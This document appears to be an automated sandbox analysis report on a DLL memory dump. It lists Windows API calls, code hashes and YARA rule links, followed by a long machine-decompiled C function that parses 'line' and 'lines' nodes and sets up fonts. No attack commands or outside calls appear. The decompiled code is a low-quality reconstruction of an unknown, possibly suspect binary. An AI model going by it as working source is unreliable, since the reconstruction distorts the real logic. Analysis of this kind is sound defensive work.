Part of subcall function 6E4DA294: _free.LIBCMT ref: 6E4DA2EF

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E4E61F0
IsValidCodePage.KERNEL32(00000000), ref: 6E4E624B
IsValidLocale.KERNEL32(?,00000001), ref: 6E4E625A
GetLocaleInfoW.KERNEL32(?,00001001,6E4DB71F,00000040,?,6E4DB83F,00000055,00000000,?,?,00000055,00000000), ref: 6E4E62A2
GetLocaleInfoW.KERNEL32(?,00001002,6E4DB79F,00000040), ref: 6E4E62C1

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_abort_free
String ID:
API String ID: 1247548202-0
Opcode ID: 7d2768596c38fdc151203c47424734d6cab8b824620af3503d49ef94ba426c43
Instruction ID: f14fba6f6a89cc42518737fbc63d5220bba6154381989925c18fbccf4372b171
Opcode Fuzzy Hash: 7d2768596c38fdc151203c47424734d6cab8b824620af3503d49ef94ba426c43
Instruction Fuzzy Hash: 1F5181719102069FEF51DFF5CC50EAEB3B8BF05706F0044AAEA24E7641E770A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D3780, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 469COMMON

Download Yara Rule

Strings

9BNn, xrefs: 6E4D3BAC, 6E4D3BC2
9BNn, xrefs: 6E4D379D, 6E4D394A, 6E4D3B77, 6E4D3B10, 6E4D3998, 6E4D3926

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 9BNn$9BNn
API String ID: 0-660966956
Opcode ID: 8fb410383caaa7acc65429232e6d05084c5e6130ecc2ca8dd5f12eb1bacced4b
Instruction ID: 0ddae26127173baa1adfadfb5d7e72284b71d0103e0195a026651d2fad890cf7
Opcode Fuzzy Hash: 8fb410383caaa7acc65429232e6d05084c5e6130ecc2ca8dd5f12eb1bacced4b
Instruction Fuzzy Hash: 50023B71E042199FDF14CFA9C894B9DBBF1EF48314F1582AAE819E7344D731A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E57AC, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 6E4DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
Part of subcall function 6E4DA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
Part of subcall function 6E4DA294: _abort.LIBCMT ref: 6E4DA342

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E4DB726,?,?,?,?,6E4DB318,?,00000004), ref: 6E4E588E
_wcschr.LIBVCRUNTIME ref: 6E4E591E
_wcschr.LIBVCRUNTIME ref: 6E4E592C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E4DB726,00000000,6E4DB846), ref: 6E4E59CF

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort
String ID:
API String ID: 4244957817-0
Opcode ID: 0ed5c187a2fee32d25acdf5e1965192483b769866e421ee03a854bbdbc33d8b4
Instruction ID: 98cd10066135727493178ed6ce71343342200fe3255380cff7e40284aa422e8b
Opcode Fuzzy Hash: 0ed5c187a2fee32d25acdf5e1965192483b769866e421ee03a854bbdbc33d8b4
Instruction Fuzzy Hash: 93611931A00206AAEB149BF5DC51EE673ACFF05716F14082FE915DBA80EB78E904C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C5239, Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C523E
UnhandledExceptionFilter.KERNEL32(6E4EB3CC,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C5247
GetCurrentProcess.KERNEL32(C0000409,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C5252
TerminateProcess.KERNEL32(00000000,?,6E4C5358,6E4EB3CC,00000017), ref: 6E4C5259

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e2bec9d55bbf01a940eff027c1d50f51a03f0db9de6935097b4aa8d6d7675381
Instruction ID: 09a68c302f1def6ff66c21693d4e41e5950d726f4c0b480416975e72a4809ca7
Opcode Fuzzy Hash: e2bec9d55bbf01a940eff027c1d50f51a03f0db9de6935097b4aa8d6d7675381
Instruction Fuzzy Hash: 5CD01232000B08EBCE213BF0E90CA88BF28EB0A7A2F044000F70A8206ACB3164408B62

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B9BA0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424
memoryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E4B9BA0(intOrPtr* __ebx, int __ecx, signed int __edx, short* __edi, long long __fp0) {
				int _v8;
				char _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				int _v60;
				signed int _v64;
				int _v68;
				char _v71;
				int _v72;
				int _v76;
				char _v77;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				signed int _v96;
				int _v100;
				int _v104;
				int _v108;
				int _v112;
				int _v116;
				char _v117;
				int _v120;
				int _v124;
				int _v128;
				int _v132;
				int _v136;
				int _v140;
				int _v144;
				int _v148;
				signed int _v152;
				int _v156;
				char _v172;
				void* _v173;
				int _v180;
				signed int _v184;
				int _v188;
				int _v192;
				int _v196;
				int _v200;
				int _v204;
				int _v208;
				int _v212;
				int _v216;
				int _v220;
				int _v224;
				int _v228;
				int* _v232;
				int _v264;
				char _v272;
				signed int _v276;
				int _v296;
				signed int _v432;
				int _v480;
				int _v520;
				char _v528;
				signed int _v532;
				int _v544;
				char _v576;
				int _v580;
				signed int _v588;
				short* _v592;
				intOrPtr* _v596;
				char _v608;
				signed int _v612;
				char _v632;
				int _v676;
				char _v684;
				signed int _v688;
				int _v696;
				intOrPtr* _v768;
				intOrPtr _v800;
				char _v816;
				signed int _v824;
				char _v1348;
				int _v1352;
				intOrPtr _v1468;
				char _v1484;
				signed int _v1492;
				intOrPtr _v1500;
				int _v1604;
				char _v1612;
				void* __esi;
				void* __ebp;
				signed int _t903;
				signed int _t904;
				int* _t908;
				signed int _t913;
				signed int _t914;
				intOrPtr _t921;
				signed int _t927;
				signed int _t933;
				signed int _t934;
				int _t936;
				int _t938;
				intOrPtr* _t947;
				signed int _t953;
				signed int _t954;
				int _t957;
				signed int _t960;
				signed int _t961;
				int _t964;
				signed int _t967;
				signed int _t968;
				int _t972;
				int _t975;
				short* _t980;
				intOrPtr _t983;
				signed int _t989;
				signed int _t990;
				int _t991;
				int* _t999;
				int _t1000;
				int _t1001;
				int* _t1007;
				signed int _t1013;
				int _t1031;
				int _t1032;
				int _t1033;
				int _t1034;
				int _t1035;
				int _t1037;
				void* _t1039;
				int _t1041;
				int _t1043;
				int _t1045;
				int _t1047;
				int _t1048;
				int _t1049;
				int _t1050;
				int _t1051;
				int _t1052;
				int _t1054;
				intOrPtr* _t1062;
				intOrPtr _t1068;
				int _t1077;
				int _t1081;
				int _t1082;
				int _t1083;
				int _t1086;
				int _t1087;
				int _t1088;
				int _t1090;
				void* _t1095;
				int _t1096;
				void* _t1097;
				int _t1098;
				signed int _t1099;
				int _t1103;
				int _t1104;
				int* _t1109;
				signed int _t1111;
				int _t1114;
				int _t1115;
				int _t1119;
				int _t1120;
				int* _t1125;
				signed int _t1127;
				int _t1130;
				int _t1135;
				int _t1136;
				int _t1142;
				int _t1146;
				int _t1147;
				int _t1148;
				int _t1151;
				int _t1152;
				int _t1153;
				int _t1155;
				void* _t1160;
				int _t1161;
				void* _t1162;
				int _t1163;
				void* _t1164;
				int _t1165;
				void* _t1166;
				int _t1167;
				void* _t1168;
				int _t1169;
				void* _t1170;
				int _t1171;
				signed int _t1172;
				int _t1176;
				int _t1177;
				void* _t1182;
				signed int _t1184;
				int _t1187;
				int _t1188;
				int _t1192;
				int _t1193;
				void* _t1198;
				signed int _t1200;
				int _t1203;
				int _t1204;
				int _t1208;
				int _t1209;
				void* _t1214;
				signed int _t1217;
				int _t1220;
				int _t1221;
				int _t1225;
				int _t1226;
				int* _t1231;
				int _t1232;
				signed int _t1233;
				int _t1236;
				int _t1237;
				int _t1241;
				int _t1242;
				int* _t1247;
				int _t1248;
				signed int _t1249;
				int _t1252;
				int _t1253;
				int _t1257;
				int _t1258;
				int* _t1263;
				int _t1264;
				signed int _t1265;
				int _t1268;
				int _t1269;
				int _t1273;
				int _t1274;
				intOrPtr* _t1279;
				intOrPtr* _t1283;
				int _t1288;
				int _t1292;
				int _t1293;
				int _t1294;
				int _t1297;
				int _t1298;
				int _t1301;
				short* _t1303;
				int _t1304;
				int _t1306;
				int _t1307;
				int _t1308;
				int _t1310;
				int _t1317;
				int _t1321;
				int _t1325;
				int _t1339;
				int _t1340;
				int _t1341;
				int _t1343;
				void* _t1348;
				int _t1349;
				void* _t1350;
				int _t1351;
				void* _t1352;
				int _t1353;
				void* _t1354;
				int _t1355;
				void* _t1356;
				int _t1357;
				signed int _t1358;
				int _t1362;
				int _t1363;
				void* _t1368;
				signed int _t1371;
				int _t1374;
				int _t1375;
				int _t1379;
				int _t1380;
				signed int _t1388;
				int _t1391;
				int _t1392;
				int _t1396;
				int _t1397;
				int _t1403;
				void* _t1404;
				signed int _t1405;
				int _t1409;
				int _t1410;
				int _t1414;
				int _t1415;
				int _t1421;
				void* _t1422;
				signed int _t1423;
				int _t1427;
				int _t1428;
				int _t1432;
				int _t1433;
				int* _t1438;
				int _t1439;
				signed int _t1440;
				int _t1443;
				int _t1444;
				int _t1448;
				int _t1449;
				int _t1456;
				int _t1460;
				short* _t1462;
				int _t1463;
				int _t1465;
				int _t1466;
				int _t1467;
				int _t1469;
				int _t1476;
				int _t1479;
				int* _t1496;
				int _t1498;
				int _t1501;
				int _t1502;
				int _t1505;
				short* _t1507;
				int _t1508;
				int _t1510;
				int _t1511;
				int _t1512;
				int _t1514;
				int* _t1522;
				intOrPtr* _t1525;
				void* _t1526;
				void* _t1530;
				char _t1531;
				signed int _t1532;
				void* _t1536;
				intOrPtr* _t1542;
				signed int _t1544;
				int _t1547;
				int _t1552;
				intOrPtr* _t1558;
				signed int _t1559;
				void* _t1560;
				void* _t1562;
				int _t1566;
				int _t1567;
				int _t1570;
				int _t1571;
				int _t1572;
				int _t1573;
				int _t1574;
				int _t1575;
				int _t1582;
				int _t1583;
				signed int _t1585;
				signed int* _t1586;
				signed int _t1587;
				int _t1588;
				signed int _t1589;
				signed int _t1590;
				signed int _t1591;
				int* _t1592;
				int _t1593;
				int _t1594;
				intOrPtr* _t1599;
				signed int _t1603;
				intOrPtr _t1606;
				int* _t1615;
				int _t1616;
				intOrPtr* _t1628;
				intOrPtr _t1632;
				int _t1634;
				signed int _t1642;
				signed int _t1644;
				int _t1654;
				signed int _t1662;
				signed int _t1664;
				signed int _t1666;
				signed int _t1668;
				signed int _t1670;
				signed int _t1672;
				intOrPtr* _t1689;
				intOrPtr* _t1696;
				intOrPtr* _t1704;
				void* _t1711;
				void* _t1712;
				int _t1713;
				signed int _t1727;
				signed int _t1729;
				signed int _t1731;
				signed int _t1733;
				signed int _t1735;
				int _t1742;
				void* _t1743;
				signed int _t1755;
				int _t1773;
				signed int _t1785;
				intOrPtr _t1792;
				intOrPtr* _t1794;
				void* _t1795;
				signed int _t1796;
				signed int _t1797;
				signed int _t1798;
				signed int _t1800;
				void* _t1803;
				int _t1810;
				int _t1811;
				int _t1812;
				signed int _t1815;
				signed int _t1816;
				void* _t1817;
				void* _t1818;
				int _t1819;
				short* _t1823;
				int _t1834;
				int _t1835;
				signed int* _t1837;
				int _t1839;
				int _t1840;
				int _t1842;
				intOrPtr _t1844;
				int _t1845;
				int _t1846;
				int* _t1848;
				int _t1850;
				void* _t1852;
				int _t1854;
				int _t1855;
				int _t1856;
				int _t1857;
				int _t1858;
				int _t1859;
				int _t1860;
				int _t1862;
				int _t1863;
				int _t1864;
				int _t1865;
				int _t1866;
				int _t1867;
				int _t1868;
				int _t1869;
				int _t1870;
				int _t1871;
				void* _t1872;
				int _t1873;
				void* _t1874;
				int _t1875;
				void* _t1876;
				int _t1877;
				int _t1879;
				int _t1880;
				int _t1881;
				int _t1882;
				int _t1883;
				int _t1884;
				int _t1885;
				int _t1886;
				int _t1887;
				void* _t1888;
				int _t1889;
				int* _t1892;
				intOrPtr* _t1893;
				int* _t1894;
				signed int _t1896;
				signed int _t1897;
				signed int _t1898;
				signed int _t1899;
				signed int _t1900;
				signed int _t1902;
				signed int _t1905;
				signed int _t1914;
				signed int _t1915;
				signed int _t1916;
				signed int _t1919;
				signed int _t1921;
				void* _t1922;
				signed int _t1925;
				void* _t1927;
				signed int _t1933;
				signed int _t1934;
				long long _t1975;

				_t1975 = __fp0;
				_t1823 = __edi;
				_t1791 = __edx;
				_t1582 = __ecx;
				_t1558 = __ebx;
				_t1896 = _t1914;
				_push(0xffffffff);
				_push(0x6e4e9608);
				_push( *[fs:0x0]);
				_t1915 = _t1914 - 0x5c;
				_t903 =  *0x6e4ff008; // 0x2b098c7c
				_t904 = _t903 ^ _t1896;
				_v20 = _t904;
				_push(__ebx);
				_push(__edi);
				_push(_t904);
				 *[fs:0x0] =  &_v16;
				_v96 = __edx;
				_v104 = __ecx;
				_v40 = 0;
				_v8 = 0;
				_t1834 =  *__ecx;
				if(_t1834 == 0) {
					L80:
					E6E4C8660(0x80004003);
					goto L81;
				} else {
					_t1582 =  &_v40;
					_v8 = 0;
					_push(_t1582);
					_push(_t1834);
					_v40 = 0;
					if( *((intOrPtr*)( *_t1834 + 0x44))() < 0) {
						L76:
						__eflags = 0;
						goto L77;
					} else {
						_t1496 = _v40;
						if(_t1496 == 0) {
							L81:
							_t908 = E6E4C8660(0x80004003);
							goto L82;
						} else {
							_t1582 =  *_t1496;
							_t1791 =  &_v44;
							_push(_t1791);
							_push(_t1496);
							if( *((intOrPtr*)(_t1582 + 0x2c))() < 0) {
								goto L76;
							} else {
								_t1498 = 0;
								_v36 = 0;
								_v8 = 4;
								_t1558 = __imp__#6;
								_v84 = 0;
								if(_v44 <= 0) {
									L48:
									_v28 = 0;
									_v8 = 0x10;
									_t1582 =  *_v104;
									__eflags = _t1582;
									if(_t1582 == 0) {
										goto L83;
									} else {
										_t1791 =  &_v28;
										_v8 = 0x10;
										_v28 = 0;
										 *((intOrPtr*)( *_t1582 + 0x34))(_t1582, _t1791);
										_t1501 = _v28;
										__eflags = _t1501;
										if(_t1501 == 0) {
											L68:
											goto L69;
										} else {
											_t1558 = MultiByteToWideChar;
											_t1823 = __imp__#6;
											while(1) {
												_v32 = 0;
												_v8 = 0x12;
												__eflags = _t1501;
												if(_t1501 == 0) {
													goto L80;
												}
												_t1791 =  &_v32;
												_t1505 =  *((intOrPtr*)( *_t1501 + 0x1c))(_t1501, _t1791);
												__eflags = _t1505;
												if(_t1505 < 0) {
													L75:
													 *_t1823(_v32);
													_t1501 = _v28;
													L69:
													_v8 = 0x1f;
													__eflags = _t1501;
													if(_t1501 != 0) {
														 *((intOrPtr*)( *_t1501 + 8))(_t1501);
													}
													goto L71;
												} else {
													_t1507 = MultiByteToWideChar(3, 0, "lines", 0xffffffff, 0, 0);
													_t1834 = _t1507;
													_t83 = _t1834 - 1; // -1
													_t1582 = _t83;
													__imp__#4(0, _t1582);
													_t1823 = _t1507;
													__eflags = _t1823;
													if(_t1823 == 0) {
														goto L85;
													} else {
														_t1508 = MultiByteToWideChar(3, 0, "lines", 0xffffffff, _t1823, _t1834);
														__eflags = _t1508 - _t1834;
														if(_t1508 != _t1834) {
															goto L84;
														} else {
															__eflags = _t1823;
															if(_t1823 == 0) {
																goto L85;
															} else {
																__imp__#314(_v32, _t1823, 0x400, 0);
																_t1823 = __imp__#6;
																_t1834 = _t1508;
																 *_t1823(_t1823);
																__eflags = _t1834 - 1;
																if(_t1834 == 1) {
																	_t1582 =  &_v28;
																	_t1791 = _v96 + 4;
																	L86();
																}
																_v24 = 0;
																_v8 = 0x16;
																_t1510 = _v28;
																__eflags = _t1510;
																if(_t1510 == 0) {
																	goto L80;
																} else {
																	_t1582 =  *_t1510;
																	_t1791 =  &_v24;
																	_v8 = 0x16;
																	_v24 = 0;
																	_t1511 =  *((intOrPtr*)(_t1582 + 0x40))(_t1510, _t1791);
																	__eflags = _t1511;
																	if(_t1511 < 0) {
																		_v8 = 0x18;
																		_t1512 = _v24;
																		__eflags = _t1512;
																		if(_t1512 != 0) {
																			 *((intOrPtr*)( *_t1512 + 8))(_t1512);
																		}
																		goto L75;
																	} else {
																		_t1834 = _v28;
																		_t1514 = _v24;
																		__eflags = _t1834 - _t1514;
																		if(_t1834 != _t1514) {
																			_v28 = _t1514;
																			_v8 = 0x1d;
																			__eflags = _t1514;
																			if(_t1514 != 0) {
																				_t1582 =  *_t1514;
																				 *((intOrPtr*)(_t1582 + 4))(_t1514);
																				_t1514 = _v24;
																			}
																			_v8 = 0x1c;
																			__eflags = _t1834;
																			if(_t1834 != 0) {
																				 *((intOrPtr*)( *_t1834 + 8))(_t1834);
																				_t1514 = _v24;
																			}
																		}
																		_v8 = 0x1e;
																		__eflags = _t1514;
																		if(_t1514 != 0) {
																			_t1582 =  *_t1514;
																			 *((intOrPtr*)(_t1582 + 8))(_t1514);
																		}
																		 *_t1823(_v32);
																		_t1501 = _v28;
																		__eflags = _t1501;
																		if(_t1501 != 0) {
																			continue;
																		} else {
																			goto L68;
																		}
																	}
																}
															}
														}
													}
												}
												goto L685;
											}
											goto L80;
										}
									}
								} else {
									while(1) {
										_t1834 = _v40;
										if(_t1834 == 0) {
											goto L80;
										} else {
											_t1582 =  *_t1834;
											_t19 = _t1582 + 0x28; // 0xe9ec4d8d
											_t1823 =  *_t19;
											_v8 = 5;
											if(_t1498 != 0) {
												_t1582 =  *_t1498;
												 *((intOrPtr*)(_t1582 + 8))(_t1498);
											}
										}
										_v8 = 4;
										_push( &_v36);
										_push(_v84);
										_v36 = 0;
										_push(_t1834);
										if( *_t1823() < 0) {
											L47:
											L71:
											_v8 = 0x20;
											_t1502 = _v36;
											__eflags = _t1502;
											if(_t1502 != 0) {
												 *((intOrPtr*)( *_t1502 + 8))(_t1502);
											}
											L77:
											_v8 = 0x21;
											_t1773 = _v40;
											__eflags = _t1773;
											if(_t1773 != 0) {
												 *((intOrPtr*)( *_t1773 + 8))(_t1773);
											}
											 *[fs:0x0] = _v16;
											__eflags = _v20 ^ _t1896;
											return E6E4C4D4A(_v20 ^ _t1896);
										} else {
											_v24 = 0;
											_v8 = 8;
											_t1522 = _v36;
											if(_t1522 == 0) {
												goto L80;
											} else {
												_t1582 =  *_t1522;
												_t1791 =  &_v24;
												_push(_t1791);
												_push(_t1522);
												if( *((intOrPtr*)(_t1582 + 0x1c))() < 0) {
													L46:
													 *_t1558(_v24);
													goto L47;
												} else {
													_t1525 = _v36;
													if(_t1525 == 0) {
														goto L80;
													} else {
														_t1791 =  &_v76;
														_t1526 =  *((intOrPtr*)( *_t1525 + 0x20))(_t1525, _t1791);
														_t1955 = _t1526;
														if(_t1526 < 0) {
															goto L46;
														} else {
															_t1582 =  &_v32;
															_v32 = 0;
															E6E4B8D60(_t1582, _t1791, _t1955, _v24);
															_v8 = 0xd;
															__imp__#8( &_v60);
															_t908 =  &_v60;
															__imp__#10(_t908,  &_v76);
															_t1956 = _t908;
															if(_t908 < 0) {
																L82:
																E6E4C8660(_t908);
																L83:
																E6E4C8660(0x80004003);
																L84:
																__imp__#6(_t1823);
																L85:
																E6E4B8BA0(0x8007000e);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t1896);
																_t1897 = _t1915;
																_push(0xffffffff);
																_push(0x6e4e9658);
																_push( *[fs:0x0]);
																_t1916 = _t1915 - 0x54;
																_t913 =  *0x6e4ff008; // 0x2b098c7c
																_t914 = _t913 ^ _t1897;
																_v152 = _t914;
																_push(_t1558);
																_push(_t1834);
																_push(_t1823);
																_push(_t914);
																 *[fs:0x0] =  &_v148;
																_t1559 = _t1791;
																_v156 = 0;
																_v140 = 0;
																_t1583 =  *_t1582;
																__eflags = _t1583;
																if(_t1583 == 0) {
																	L121:
																	E6E4C8660(0x80004003);
																	goto L122;
																} else {
																	_t1791 =  &_v28;
																	_v12 = 0;
																	_v28 = 0;
																	 *((intOrPtr*)( *_t1583 + 0x34))(_t1583,  &_v28);
																	_t1456 = _v28;
																	__eflags = _t1456;
																	if(_t1456 == 0) {
																		L114:
																		goto L115;
																	} else {
																		_t1823 = __imp__#6;
																		while(1) {
																			_v36 = 0;
																			_v12 = 2;
																			__eflags = _t1456;
																			if(_t1456 == 0) {
																				goto L121;
																			}
																			_t1791 =  &_v36;
																			_t1460 =  *((intOrPtr*)( *_t1456 + 0x1c))(_t1456,  &_v36);
																			__eflags = _t1460;
																			if(_t1460 < 0) {
																				L120:
																				 *_t1823(_v36);
																				_t1456 = _v28;
																				L115:
																				_v12 = 0xd;
																				__eflags = _t1456;
																				if(_t1456 != 0) {
																					 *((intOrPtr*)( *_t1456 + 8))(_t1456);
																				}
																				 *[fs:0x0] = _v20;
																				__eflags = _v24 ^ _t1897;
																				return E6E4C4D4A(_v24 ^ _t1897);
																			} else {
																				_t1462 = MultiByteToWideChar(3, 0, "line", 0xffffffff, 0, 0);
																				_t1834 = _t1462;
																				_t136 = _t1834 - 1; // -1
																				_t1583 = _t136;
																				__imp__#4(0, _t1583);
																				_t1823 = _t1462;
																				__eflags = _t1823;
																				if(_t1823 == 0) {
																					L123:
																					E6E4B8BA0(0x8007000e);
																					goto L124;
																				} else {
																					_t1463 = MultiByteToWideChar(3, 0, "line", 0xffffffff, _t1823, _t1834);
																					__eflags = _t1463 - _t1834;
																					if(_t1463 != _t1834) {
																						L122:
																						__imp__#6(_t1823);
																						goto L123;
																					} else {
																						__eflags = _t1823;
																						if(_t1823 == 0) {
																							goto L123;
																						} else {
																							__imp__#314(_v36, _t1823, 0x400, 0);
																							_t1823 = __imp__#6;
																							_t1834 = _t1463;
																							 *_t1823(_t1823);
																							__eflags = _t1834 - 1;
																							if(_t1834 != 1) {
																								L104:
																								_v32 = 0;
																								_v12 = 6;
																								_t1465 = _v28;
																								__eflags = _t1465;
																								if(_t1465 == 0) {
																									goto L121;
																								} else {
																									_t1583 =  *_t1465;
																									_t1791 =  &_v32;
																									_v12 = 6;
																									_v32 = 0;
																									_t1466 =  *((intOrPtr*)(_t1583 + 0x40))(_t1465,  &_v32);
																									__eflags = _t1466;
																									if(_t1466 < 0) {
																										_v12 = 8;
																										_t1467 = _v32;
																										__eflags = _t1467;
																										if(_t1467 != 0) {
																											 *((intOrPtr*)( *_t1467 + 8))(_t1467);
																										}
																										goto L120;
																									} else {
																										_t1834 = _v28;
																										_t1469 = _v32;
																										__eflags = _t1834 - _t1469;
																										if(_t1834 != _t1469) {
																											_v28 = _t1469;
																											_v12 = 0xb;
																											__eflags = _t1469;
																											if(_t1469 != 0) {
																												_t1583 =  *_t1469;
																												 *((intOrPtr*)(_t1583 + 4))(_t1469);
																												_t1469 = _v32;
																											}
																											_v12 = 0xa;
																											__eflags = _t1834;
																											if(_t1834 != 0) {
																												 *((intOrPtr*)( *_t1834 + 8))(_t1834);
																												_t1469 = _v32;
																											}
																										}
																										_v12 = 0xc;
																										__eflags = _t1469;
																										if(_t1469 != 0) {
																											_t1583 =  *_t1469;
																											 *((intOrPtr*)(_t1583 + 8))(_t1469);
																										}
																										 *_t1823(_v36);
																										_t1456 = _v28;
																										__eflags = _t1456;
																										if(_t1456 != 0) {
																											continue;
																										} else {
																											goto L114;
																										}
																									}
																								}
																							} else {
																								_push(5);
																								_v80 = 0;
																								_v76 = 7;
																								_v96 = 0;
																								_t1476 = E6E4BC650(_t1559,  &_v96, _t1823, _t1834, _t1975, L"Arial");
																								asm("movsd xmm0, [0x6e4f9598]");
																								_v72 = _t1834;
																								_v68 = 0xffffff;
																								asm("movsd [ebp-0x38], xmm0");
																								_v56 = 0;
																								_v52 = 0;
																								_v48 = 0;
																								_v12 = 4;
																								L138();
																								__eflags = _t1476;
																								if(_t1476 != 0) {
																									_t1834 =  *(_t1559 + 4);
																									_push( &_v96);
																									__eflags =  *((intOrPtr*)(_t1559 + 8)) - _t1834;
																									if( *((intOrPtr*)(_t1559 + 8)) == _t1834) {
																										_push(_t1834);
																										E6E4BCD50(_t1559, _t1975);
																									} else {
																										_v100 = _t1834;
																										E6E4BD670(_t1834);
																										 *((char*)(_t1834 + 0x18)) = _v72;
																										 *((char*)(_t1834 + 0x19)) = _v71;
																										 *((intOrPtr*)(_t1834 + 0x1c)) = _v68;
																										asm("movsd xmm0, [ebp-0x38]");
																										asm("movsd [esi+0x20], xmm0");
																										_v12 = 5;
																										E6E4BD4E0(_t1834 + 0x28, _t1975,  &_v56);
																										 *(_t1559 + 4) =  *(_t1559 + 4) + 0x38;
																									}
																								}
																								_t1583 =  &_v56;
																								_v12 = 2;
																								E6E4BC5D0(_t1559, _t1583, _t1823, _t1834, _t1975);
																								_t1791 = _v76;
																								__eflags = _t1791 - 8;
																								if(_t1791 < 8) {
																									L103:
																									__eflags = 0;
																									_v80 = 0;
																									_v76 = 7;
																									_v96 = 0;
																									goto L104;
																								} else {
																									_t1583 = _v96;
																									_t1791 = 2 + _t1791 * 2;
																									_t1479 = _t1583;
																									__eflags = _t1791 - 0x1000;
																									if(_t1791 < 0x1000) {
																										L102:
																										_push(_t1791);
																										E6E4C4D5B(_t1583);
																										_t1916 = _t1916 + 8;
																										goto L103;
																									} else {
																										_t1583 =  *(_t1583 - 4);
																										_t1791 = _t1791 + 0x23;
																										__eflags = _t1479 - _t1583 + 0xfffffffc - 0x1f;
																										if(__eflags > 0) {
																											L124:
																											E6E4CEF16(_t1559, _t1583, _t1791, _t1823, __eflags);
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											_push(_t1834);
																											_t1835 = _t1583;
																											E6E4BC5D0(_t1559, _t1835 + 0x28, _t1823, _t1835, _t1975);
																											_t1585 =  *(_t1835 + 0x14);
																											__eflags = _t1585 - 8;
																											if(_t1585 < 8) {
																												L129:
																												 *(_t1835 + 0x10) = 0;
																												__eflags = 0;
																												 *(_t1835 + 0x14) = 7;
																												 *_t1835 = 0;
																												return 0;
																											} else {
																												_t921 =  *_t1835;
																												_t1586 = 2 + _t1585 * 2;
																												__eflags = _t1586 - 0x1000;
																												if(_t1586 < 0x1000) {
																													L128:
																													_push(_t1586);
																													E6E4C4D5B(_t921);
																													goto L129;
																												} else {
																													_t1792 =  *((intOrPtr*)(_t921 - 4));
																													_t1586 =  &(_t1586[8]);
																													__eflags = _t921 - _t1792 + 0xfffffffc - 0x1f;
																													if(__eflags > 0) {
																														E6E4CEF16(_t1559, _t1586, _t1792, _t1823, __eflags);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_push(_t1835);
																														_t1837 = _t1586;
																														_t1587 = _t1837[5];
																														__eflags = _t1587 - 8;
																														if(_t1587 < 8) {
																															L136:
																															_t1837[4] = 0;
																															__eflags = 0;
																															_t1837[5] = 7;
																															 *_t1837 = 0;
																															return 0;
																														} else {
																															_t927 =  *_t1837;
																															_t1588 = 2 + _t1587 * 2;
																															__eflags = _t1588 - 0x1000;
																															if(_t1588 < 0x1000) {
																																L135:
																																_push(_t1588);
